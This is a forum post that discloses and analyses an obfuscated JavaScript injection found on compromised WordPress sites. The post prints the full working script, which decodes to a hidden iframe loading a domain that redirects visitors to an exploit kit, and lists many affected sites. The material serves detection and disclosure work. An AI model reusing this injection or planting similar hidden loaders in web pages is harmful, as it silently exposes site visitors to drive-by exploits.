Author Topic: yahoo-statistic.com directs to exploits  (Read 4916 times)


April 16, 2010, 05:34:16 pm

SysAdMini

We have seen an increasing number of sites running WordPress that contain an obfuscated script.

Code: [Select]
<!--
  Analyst note (comment added for readers; the sample below is unchanged).
  What the script does once its strings are decoded:
  * String.prototype.mM is defined as a thin wrapper around replace(). Each
    meaningful string is stored with filler characters mixed in, and a regex
    character class strips them at run time.
  * Decoded values: 'style', 'appendChild', 'iframe', 'createElement', 'write',
    'setAttribute', 'src', 'body', 'display:none', 'setTimeout'.
  * vS.prototype.sW() returns the decoded URL
    hxxp://yahoo-statistic[.]com/js/default.html (defanged here).
  * vS.prototype.r() creates an iframe element, sets its src to the value from
    sW(), sets its style to display:none and appends it to document.body, so
    the visitor sees nothing on the page.
  * If that throws (catch branch), it calls document.write with a decoded
    string that ends in the closing body and html tags, then re-runs r()
    through setTimeout after 231 ms.
  * The remaining assignments, empty functions and Date/Array objects are never
    read in this sample and look like padding (presumably to vary the script's
    appearance; confirm against other samples).
  For detection, the variable names are probably not stable. The traits visible
  here are the String.prototype wrapper around replace(), strings decoded
  through regex character classes, and a display:none iframe appended to
  document.body.
-->
<!-- ~ --><script type='text/javascript'>function vS(){};this.nU='';vS.prototype = {r : function() {this.k="";this.mQ="";this.w='';this.zD=false;oD=false;wD="wD";var z=document;this.n=false;h="h";f="";var m=window;this.d=22706;var iQ=function(){return 'iQ'};uM=17389;function p(){};this.gQ="gQ";this.zT=false;var c=new Array();var bJ="bJ";    String.prototype.mM=function(g, u){return this.replace(g, u)};this.pO='';this.y=47529;var jU="jU";sR="sR";tV='';function rE(){};bC="bC";var t = 's{t?y{lKe?'.mM(/[\?K\{\|z]/g, '');iY=false;function tC(){};this.dF="";var tS=52222;        var v = 'a_pDpNeNnsdDCDhsiNlDdN'.mM(/[NDLs_]/g, '');this.tJ="";var bG='';var j = 'iwf>rUa>mUe>'.mM(/[\>w9UH]/g, '');function uZ(){};var aO="aO";var i = 'c]r]e#a@the]E#l]e#m]ehn]t#'.mM(/[#x@\]h]/g, '');eO='';l=false;var b = 'w>rviRtTev'.mM(/[v\>RT2]/g, '');var tW=34149;this.eG="eG";var rEL="";var e = 'sve:tIA:tkt:rkiIbvuvtvec'.mM(/[cvI\:k]/g, '');var iQD=function(){};var oW="";var kY=function(){return 'kY'};var s = 's0r?c?'.mM(/[\?10B7]/g, '');function pW(){};this.dJ="dJ";var jV = 'bSoSd?y?'.mM(/[\?Sp\(n]/g, '');var kI=function(){return 'kI'};this.uR="";vO="";hW='';var rM = 'd*i*s*p3lHaHy*:wn^o*n*e^'.mM(/[\^\*Hw3]/g, '');function yL(){};var eD=new Date();var iM=function(){};var x='';var uB = 'sUeNtNTLi$m$eNoUu$t$'.mM(/[\$NUCL]/g, '');iZ=411;function uN(){};this.iW=false;var fS=new Array();this.lV="lV";var eOX=function(){};tG="";try {this.fY="";var aON=new Date();gF=41884;this.kL="kL";var rS='';var a=z[i](j);eB=45917;nZ='';var oU=function(){return 'oU'};this.tK=36442;a[e](s, this.sW());gD="";this.yJ=63939;var lB=false;var kYF="";a[e](t, rM);var cT=52936;this.pS=false;this.cU=false;var q=65146;var fYC=new Array();document[jV][v](a);var kR=false;this.gB=false;function tP(){};var gU=9828;var bK=false;rV="";} catch(o) {kA='';this.oX='';var oV='';this.bT=false;z.write('tpO%swL%<%/%bpowdwy%>%<p/phptwm%lZ>I'.mM(/[Iwp%Z]/g, ''));zU="zU";this.sC='';function rH(){};jUL='';var aP = this;var zB=function(){};var 
sS="sS";var vF=function(){};m[uB](function(){ aP.r() }, 231);var qG=new Date();lG="lG";this.sM="";}xG='';this.dU="";},sW : function() {xB="xB";var wT="";var jVA=new Date();return 'h+t8tBp8:+/8/+yMaxhMoBoM-Bs+tBa8tBi8sxt+ixcM.+cBo+mx/BjBsB/Md+exfBaxu8l8tM.Bh+txmxl+'.mM(/[\+BMx8]/g, '');var jR="";rD="";}};this.nA=false;var hG=new vS(); this.jG=50573;hG.r();gA='';</script><!-- ~ -->
Once decoded, this code loads the following page in a hidden iframe:

Code: [Select]
yahoo-statistic.com/js/default.html
which directs to an exploit kit.

Here are 2 examples:
http://wepawet.cs.ucsb.edu/view.php?hash=97e3dfd9d2dcfd796af0b4aa987402ba&t=1271433212&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=8800f44d7afa20e2dc4c5e453081ff71&t=1271435087&type=js

You won't be surprised by the registrant:

Quote
Domain name: yahoo-statistic.com

Registrant Contact:
   HardSoft, inc
   Hilary Kneber hilarykneber@yahoo.com
   7569468 fax: 7569468
   29/2 Sun street. Montey 29
   Virginia NA 3947
   us

A few more examples of affected sites:
Code: [Select]
www.bocabeacon.com/
www.skatetheory.com/news/wicked-fashion-launches-rs-by-sheckler/7026
www.jeffboskovitch.org/
impactincorp.com/
acoff.net/index.php?page_id=84&cat=internet&sub=webmoney
addso.ru/
addso.ru/mat-i-doch/
addso.ru/otec-i-doch/
agame.ca/
alexeevboxing.com/?page_id=1291
blog-edu.org/?p=364
blog.mobivity.com/?p=147
blog.whartonmedicalclinic.com/
bradgilbert.tennisweek.com/?p=175
celestia.ru/times/?p=79
clubbalaiisabel.com/
dealermobilhonda.com/?p=494
doggiedelightsva.com/test/?page_id=34&category=7&product_id=51
dubaicompanieshouse.com/
e-shcheglov.ru/
eliteman.ru/
epsomwrites.org/
french-perfum.ru/?p=75
gerardlim.convertium.com/?p=12
japanesebottleopener.com/
koreanblogs.ru/?m=200704
lvpf.net/
masterprophetblog.com/
mowa.gov.af/english/?page_id=458
ourvisionspaforyou.com/blog/?p=4686
peregonmashin.ru/
phiswork.ru/?p=15&page=6
pokachi.net/
pozhbezpeka.net.ua/?page_id=223
pride-u-bike.com/2006/09/30/akkymtlator/
pride-u-bike.com/2007/06/23/s-tolkacha/
pride-u-bike.com/2007/07/30/doroga-smerti/
pride-u-bike.com/byzapimoto/
pride-u-bike.com/motorcycle/suzuki-motorcycle/
pride-u-bike.com/motorcycle/vozdeniye-motorcycle/
pride-u-bike.com/sell/honda-steed-400-1996/
pride-u-bike.com/sell/honda-vfr400r-nc30/
quotidiennokoue.com/
quotidiennokoue.com/?cat=5
quotidiennokoue.com/?p=558
safety.amw.com/family/ask-john-walsh-how-can-i-tell-if-a-child-has-been-abused/
safety.amw.com/home/stop-domestic-violence-before-it-starts/
sometimesiamanasshole.com/blog/
spiceroute.org/
thebeauteeshop.com/blog/
thebeauteeshop.com/blog/?p=236
tigernewspaper.com/wordpress/
vip-iceland.com/?page_id=2
webcache.googleusercontent.com/search?q=cache:_JzxW0ExC_0J:abogadospontevedra.com/%3Fpage_id%3D155+honorarios+ejecucion+de+sentencia+exequatur&cd=16&hl=es&ct=clnk&gl=es
weirdfortunecookies.com/2000/05/02/dont-ask-dont-tell/
wmserver.net/sgcg/?page_id=5
wp9.ru/
www.andressolimano.com/andressolimano/
www.artvanprogram.org/
www.bailgun.com/
www.ballballmachine.com/?page_id=3&category=1
www.baunproject.org/?page_id=20
www.berkland.org//resources/devotionals/
www.bocabeacon.com/
www.bocabeacon.com/?p=3894
www.bocabeacon.com/?p=3982
www.c3intel.com/background-checks/?page_id=11
www.coutureforthesoul.com/
www.georgeferrandi.com/
www.graceandtruthchurch.org/?page_id=8
www.gutsglamgrace.com/?cat=20
www.gutsglamgrace.com/?p=2009
www.homeplacestructures.net/playhouses
www.hopedworaczyk.com/blog/
www.ilcastelloedizioni.com/zeroweb/?p=376
www.ingatlanelado.net/kert-otthon/padlofutes-es-hoszigeteles/
www.intentionaltreasures.com/
www.jeffboskovitch.org/
www.karachiblog.com/index.php/category/karachi-education/
www.keroroworld.com/
www.kitchen2404.com/
www.ktcrystals.com/content/?page_id=32
www.livrariaviasapiens.com.br/?p=117
www.logotales.com/wp/index.php
www.marielorenz.com/inprogress/?p=2384
www.marielorenz.com/inprogress/?page_id=2683
www.marlaktuell.de/
www.marlaktuell.de/?cat=2
www.marques.pro.br/?page_id=389
www.martinluthermccoy.com/
www.onebigmaine.com/maine/native-animals-of-maine/
www.rinf.com/columnists/news/10-secret-societies-you-need-to-know-about
www.rinf.com/columnists/news/the-us-governments-secret-colorado-oil-discovery
www.sanseracingteam.com/wordpress/
www.sanseracingteam.com/wordpress/?p=128
www.scottyblog.com/
www.scottyblog.com/?p=338
www.sharma.com.ua/?cat=11
www.skatetheory.com/
www.skatetheory.com/category/events/?a_name=&apost_id=&a_content=&securitycode=&paged=130
www.skatetheory.com/events/contests/king-of-spring-skateboard-showdown-2010-nyc/8607
www.skatetheory.com/events/contests/schooled-series-2010/8484
www.skatetheory.com/events/journeys-backyard-bbq-2008-philadelphia-pa/3894
www.skatetheory.com/locator/skateparks/PA/
www.skatetheory.com/news/active-introduces-mike-mo-capaldi/5770
www.skatetheory.com/news/emericas-wild-ride-tour-2008/3616
www.skatetheory.com/news/lord-of-dogtown-jay-adams-is-released-from-jail/4984
www.skatetheory.com/news/vince-del-valle-lem-villemin-on-adidas/1608
www.skatetheory.com/upcoming-events/
www.skatetheory.com/wp-content/u
www.soacenter.com/?p=172
www.sonnoli.com/?page_id=5
www.stirparts.ru/
www.tiergestuetzt.de/
www.travelanswerman.com/Blog/?p=1574
www.tvzete.net/
Ruining the bad guy's day